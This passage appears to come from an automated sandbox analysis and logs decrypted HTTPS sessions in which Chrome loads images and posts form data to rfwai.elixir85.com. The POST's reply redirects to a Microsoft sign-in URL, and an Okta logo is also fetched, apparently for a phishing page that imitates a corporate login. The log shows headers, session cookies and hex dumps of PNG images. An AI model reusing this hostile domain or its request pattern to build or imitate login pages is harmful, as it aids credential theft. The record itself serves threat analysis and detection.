                                                        66192.168.2.549795104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:22 UTC1457OUTGET /ijBHzsqcIkRtTjbxMugPeR81zw0x5yUVlfNjXopYiBinvvsl7gMzOUKramHNI6Cfhnab228 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:23 UTC660INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:23 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 1400
                                                        Connection: close
                                                        Content-Disposition: inline; filename="ijBHzsqcIkRtTjbxMugPeR81zw0x5yUVlfNjXopYiBinvvsl7gMzOUKramHNI6Cfhnab228"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qv4cd1pNI05uaNgpjeIDsTYoImW3pzaztnSewkR2MZtRAKsODz4dU45ctqm2ZKa1tLQoEEQMk7DdvnVz9I71wYbTMxdWmj8DrCPHRoo9ujyN0Je5J%2FtUpF3XzEFk9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d9287858ea4285-EWR
                                                        2024-07-03 19:07:23 UTC709INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 05 3f 49 44 41 54 68 43 ed 58 bd 6e 13 41 10 be 4b d2 d0 20 87 b4 48 38 bc 00 c9 13 10 37 50 c6 ee 91 70 9e 00 e7 af 26 ae f3 83 f3 04 18 89 3e 97 92 34 98 27 c0 79 81 60 24 5a c0 d0 d0 24 31 df b7 9a 39 8d 97 3b bc 91 0c 77 91 7c d2 c9 f6 7a 76 76 76 be f9 8f 7f d6 1f 8e a2 b0 e7 db dd e4 62 e9 e5 59 f4 15 e4 f7 42 b6 b4 9f 44 71 08 dd 8c 26 5c 03 f1 0c b0 70 65 95 81 72 06 58 19 50 b8 81 0c 33 c0 6e a0 ac 7f 4d da 6a b5 aa f3 f3 f3 2b a3 d1 a8 72 7d 7d 9d 74 3a 9d a1 7f 66 61 80 6d 6d 6d 35 55 18 08 d9 df df df ef e7 29 64 77 77 77 e5 ea ea 6a 85 ff c7 71 3c 3c 3c 3c 4c f8 7d 67 67 67 0d 1f eb 97 97 97 ed ac cb fd 6b 05 4f 93 3f f4 d1 c2 dd 5e 82 67
                                                        Data Ascii: PNGIHDRl?IDAThCXnAK H87Pp&>4'y`$Z$19;w|zvvvbYBDq&\perXP3nMj+r}}t:fammm5U)dwwwjq<<<<L}gggkO?^g
                                                        2024-07-03 19:07:23 UTC691INData Raw: ca e1 ef 65 7e 71 8a 26 e8 36 af 32 42 e0 7d c3 2a 56 ce 70 f2 9b 42 c9 f2 22 0d ef ca 27 c1 9e 4d 18 01 73 f0 73 91 99 b2 fa 1e 56 25 2d d6 3f 38 79 43 14 3f 6d 1a 1f b0 85 85 05 7a 09 15 9d 26 5d 5c 98 56 4e eb 73 1e 85 d0 f2 6a 12 60 c6 ea 19 02 6b 59 ad 82 05 0c fc 36 34 d4 59 10 ec ba 28 5f 65 61 5b e1 72 8c c8 1b 31 42 f8 e7 18 d9 1d bd 17 35 18 02 e9 c5 69 a1 75 a3 1c 16 bd fd 1e e6 61 51 f4 2b 7a b6 78 7f f4 2e fa 82 b3 82 3c 2c 7e 1a e6 61 cc 1d 10 7a 2c bc 49 85 54 87 62 da 50 ea 5e 08 60 ba 07 f2 8d 79 aa 35 38 0b 18 2c 7c 51 fb b7 bc 75 dd ab 2d 84 86 5f 95 97 ff fb 6d 85 31 1c e7 91 f6 7c 6b ac 6a 18 37 05 2c 78 f8 0b c0 96 00 58 f0 f0 17 80 65 7a b0 ef 61 04 8c 8d b4 58 de 00 8a 5c 45 98 24 80 15 2d f7 03 01 73 a0 ff ad 2f b3 39 4c fb 39 2a
                                                        Data Ascii: e~q&62B}*VpB"'MssV%-?8yC?mz&]\VNsj`kY64Y(_ea[r1B5iuaQ+zx.<,~az,ITbP^`y58,|Qu-_m1|kj7,xXezaX\E$-s/9L9*


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        67192.168.2.549799104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:22 UTC1523OUTPOST /yoCRQfrZ0iVvPSQxT7vvEGN44mzSHgJf035E0VZBImhSjl HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        Content-Length: 53
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Accept: */*
                                                        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                        X-Requested-With: XMLHttpRequest
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://rfwai.elixir85.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:22 UTC53OUTData Raw: 70 61 67 65 6c 69 6e 6b 3d 71 73 64 34 51 32 51 72 78 30 7a 56 56 61 71 41 7a 4a 31 66 45 41 25 33 44 25 33 44 26 74 79 70 65 3d 34 26 61 70 70 6e 75 6d 3d 31
                                                        Data Ascii: pagelink=qsd4Q2Qrx0zVVaqAzJ1fEA%3D%3D&type=4&appnum=1
                                                        2024-07-03 19:07:23 UTC997INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:23 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: no-cache, private
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LfrQyN1%2B0RanzMVZBcrQKFxWlsx8VEqnQUxeCzJHFRT8pMnRhgnSH8iq6urenr56ZemTTBp9EuU%2Bae83kOHhD4bGt7ihQjf%2BpoVa036JbN4quY78CPvIoRXjEzcudA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; expires=Wed, 03-Jul-2024 21:07:22 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                        2024-07-03 19:07:23 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 68 78 56 57 46 4a 4c 33 6f 30 54 7a 68 4f 56 54 42 51 52 47 68 59 62 6d 4a 79 4e 46 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 56 6d 78 7a 4e 6b 35 43 52 55 70 57 57 47 56 6d 56 55 31 4c 4e 6a 64 6a 5a 6c 42 4c 61 30 38 76 52 47 39 72 56 30 52 70 63 46 64 49 59 6a 41 35 56 32 67 79 4f 54 42 44 52 6b 31 45 53 58 56 79 4f 45 35 48 4e 6b 5a 53 61 6b 64 33 53 46 4e 6b 5a 46 49 35 5a 6c 4e 36 53 57 46 59 59 32 5a 4f 4e 6c 6b 78 52 47 35 47 61 46 46 6f 56 46 70 78 4c 30 4a 42 4e 44 5a 32 4b 7a 64 79 54 31 55 72 53 47 34 79 62 44 41 30 53 43 38 77 57 6b 4a 51 4e 6d 4d 79 52 55 6b 79 4b 33 42 32 4d 45 78 4c 4e 57 74 71 4e 56 56 56 54 7a 67
                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzg
                                                        2024-07-03 19:07:23 UTC97INData Raw: 35 62 0d 0a 7b 22 65 78 70 69 72 65 64 22 3a 30 2c 22 72 65 64 69 72 65 63 74 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6f 6d 5c 2f 63 6f 6d 6d 6f 6e 5c 2f 53 41 53 5c 2f 50 72 6f 63 65 73 73 41 75 74 68 22 7d 0d 0a
                                                        Data Ascii: 5b{"expired":0,"redirecturl":"https:\/\/login.microsoftonline.com\/common\/SAS\/ProcessAuth"}
                                                        2024-07-03 19:07:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        68192.168.2.549797108.156.39.604433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:22 UTC612OUTGET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1
                                                        Host: ok4static.oktacdn.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://rfwai.elixir85.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:07:22 UTC684INHTTP/1.1 200 OK
                                                        Content-Type: image/png
                                                        Content-Length: 10796
                                                        Connection: close
                                                        Date: Sun, 30 Jun 2024 13:04:16 GMT
                                                        Server: nginx
                                                        Last-Modified: Tue, 23 Feb 2021 04:20:08 GMT
                                                        ETag: "12bdacc832185d0367ecc23fd24c86ce"
                                                        Expires: Mon, 30 Jun 2025 13:04:16 GMT
                                                        Cache-Control: max-age=31536000
                                                        Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                        Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                        Access-Control-Allow-Origin: *
                                                        Accept-Ranges: bytes
                                                        X-Cache: Hit from cloudfront
                                                        Via: 1.1 c9e93510e33ab69af0de2f41455fbb80.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: LHR50-P1
                                                        X-Amz-Cf-Id: 0IKrpwiJbqx_-7m8TXtmoQY-3LxLqx11uA4c652Q92BUkLmhBYYJmw==
                                                        Age: 280986
                                                        2024-07-03 19:07:22 UTC10796INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 a4 00 00 00 5e 08 06 00 00 00 6c 32 60 fe 00 00 29 f3 49 44 41 54 78 da ed 7d 09 9c 1c 55 9d ff a0 8b 20 77 a6 eb bd 1a 42 10 10 50 24 8a 48 76 09 c9 74 d5 ab ea 09 91 b8 a0 78 84 45 41 40 04 51 60 81 45 14 d0 15 02 88 c8 2d ec 8a 9c 22 97 28 e7 9f e5 58 60 89 11 44 2e c3 11 c8 35 5d 5d 55 7d cd 95 c9 9d 90 83 24 33 ff df af aa 26 e9 cc bc d7 67 75 4f 77 cf fb 7d 3e ef 13 98 99 ae 7e f5 8e df f7 77 ff 5a 5a 9a 84 12 7a eb be 96 d6 46 5a 24 49 92 24 49 92 a4 d1 a0 b8 4e fe b3 c7 a4 9d 09 9d ac 74 74 b2 24 65 90 c5 09 4d f9 c5 bc e9 ea ae 72 75 24 49 92 24 49 52 d5 68 81 41 76 4b 30 c5 74 19 b9 77 79 87 3a 98 31 e8 a0 a5 93 c1 44 ce 48 c3 cf d6 4c 53 07 01 98 92 69 46 7e b6 58 8f c4 e0 73 6d 72 f5 24
                                                        Data Ascii: PNGIHDR^l2`)IDATx}U wBP$HvtxEA@Q`E-"(X`D.5]]U}$3&guOw}>~wZZzFZ$I$INtt$eMru$I$IRhAvK0twy:1DHLSiF~Xsmr$


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        69192.168.2.54980065.9.86.834433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:23 UTC374OUTGET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1
                                                        Host: ok4static.oktacdn.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:07:23 UTC684INHTTP/1.1 200 OK
                                                        Content-Type: image/png
                                                        Content-Length: 10796
                                                        Connection: close
                                                        Date: Sun, 16 Jun 2024 04:04:47 GMT
                                                        Server: nginx
                                                        Last-Modified: Tue, 23 Feb 2021 04:20:08 GMT
                                                        ETag: "12bdacc832185d0367ecc23fd24c86ce"
                                                        Expires: Mon, 16 Jun 2025 04:04:47 GMT
                                                        Cache-Control: max-age=31536000
                                                        Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                        Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                        Access-Control-Allow-Origin: *
                                                        Accept-Ranges: bytes
                                                        X-Cache: Hit from cloudfront
                                                        Via: 1.1 e10153740ff95eb4d0c9f3172baeb43e.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: AMS1-C1
                                                        X-Amz-Cf-Id: DYykeoFV6hHnlOt93mUACfK-JbrxHw7AzS3zkucEL3d9ilqVE-pQCQ==
                                                        Age: 1522956
                                                        2024-07-03 19:07:23 UTC10796INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 a4 00 00 00 5e 08 06 00 00 00 6c 32 60 fe 00 00 29 f3 49 44 41 54 78 da ed 7d 09 9c 1c 55 9d ff a0 8b 20 77 a6 eb bd 1a 42 10 10 50 24 8a 48 76 09 c9 74 d5 ab ea 09 91 b8 a0 78 84 45 41 40 04 51 60 81 45 14 d0 15 02 88 c8 2d ec 8a 9c 22 97 28 e7 9f e5 58 60 89 11 44 2e c3 11 c8 35 5d 5d 55 7d cd 95 c9 9d 90 83 24 33 ff df af aa 26 e9 cc bc d7 67 75 4f 77 cf fb 7d 3e ef 13 98 99 ae 7e f5 8e df f7 77 ff 5a 5a 9a 84 12 7a eb be 96 d6 46 5a 24 49 92 24 49 92 a4 d1 a0 b8 4e fe b3 c7 a4 9d 09 9d ac 74 74 b2 24 65 90 c5 09 4d f9 c5 bc e9 ea ae 72 75 24 49 92 24 49 52 d5 68 81 41 76 4b 30 c5 74 19 b9 77 79 87 3a 98 31 e8 a0 a5 93 c1 44 ce 48 c3 cf d6 4c 53 07 01 98 92 69 46 7e b6 58 8f c4 e0 73 6d 72 f5 24
                                                        Data Ascii: PNGIHDR^l2`)IDATx}U wBP$HvtxEA@Q`E-"(X`D.5]]U}$3&guOw}>~wZZzFZ$I$INtt$eMru$I$IRhAvK0twy:1DHLSiF~Xsmr$


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        70192.168.2.549802104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:23 UTC1435OUTGET /uvxQtGj3CZl2NHEVqVIl3gDjBSop26aE86MZBefBLzm512128 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:24 UTC641INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:24 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 231
                                                        Connection: close
                                                        Content-Disposition: inline; filename="uvxQtGj3CZl2NHEVqVIl3gDjBSop26aE86MZBefBLzm512128"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q2Bzaq9gjFfmf0DkmVX3pdPvTnzvSOFmTrMGJ3q6O4OqYJ2GoPDLf1StCT%2F7J4eYniPpVcaH6%2F6YQwc6agSEOBDfMhQUmWQ2J1sCph%2FnxCC2cTkbn3Rwq5m2620VOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d92880b9ac424d-EWR
                                                        2024-07-03 19:07:24 UTC231INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 a1 49 44 41 54 48 4b ed 93 b1 0d 02 31 10 04 e7 5a a0 0c aa b8 12 a8 80 9c 2e 20 23 24 23 a5 94 2d e1 cb 20 24 24 33 b2 f4 48 1f 80 cf bc 71 80 78 a7 3e ed 78 c7 b6 d1 79 59 e7 7c 16 40 68 f8 8f 14 b9 fb 05 18 24 9d 42 2f 93 81 2a 45 63 f8 0a d8 4a ba 7d 15 d0 12 9e 0f 52 6c d0 1a 5e 04 8c e1 1b e0 0c dc 23 2d 92 0e af 66 de 36 70 f7 63 4a 69 67 66 b5 80 fd 47 80 3c 9c 21 c0 7a ce e5 3e 61 e1 2b 6a 85 84 80 d6 26 55 80 09 e4 da e5 a3 45 2f a8 b4 5f dd 60 2e 64 01 84 e6 7e 5f d1 03 bf ca 37 19 0c 18 34 60 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDRw=sRGBIDATHK1Z. #$#- $$3Hqx>xyY|@h$B/*EcJ}Rl^#-f6pcJigfG<!z>a+j&UE/_`.d~_74`IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        71192.168.2.549801104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:23 UTC1443OUTGET /ophQfOAKqa13061H23eI96MwQ1iF0kZmnaRI3dvE34mhKSmU3i9C67140 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:24 UTC647INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:24 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 727
                                                        Connection: close
                                                        Content-Disposition: inline; filename="ophQfOAKqa13061H23eI96MwQ1iF0kZmnaRI3dvE34mhKSmU3i9C67140"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4hkdtTaZ0RRvygISq3WGWckKJ522pMFf1luC2wQw7UlCsk5NTTdZxrh%2B1N5ZLo6X9Ct1vX2YsWqnq9bQ4TQrN5gMGKfOLH%2BqoFTcNNdHwqMyYgfoZnoz0XhxfifNow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d92880d87a179d-EWR
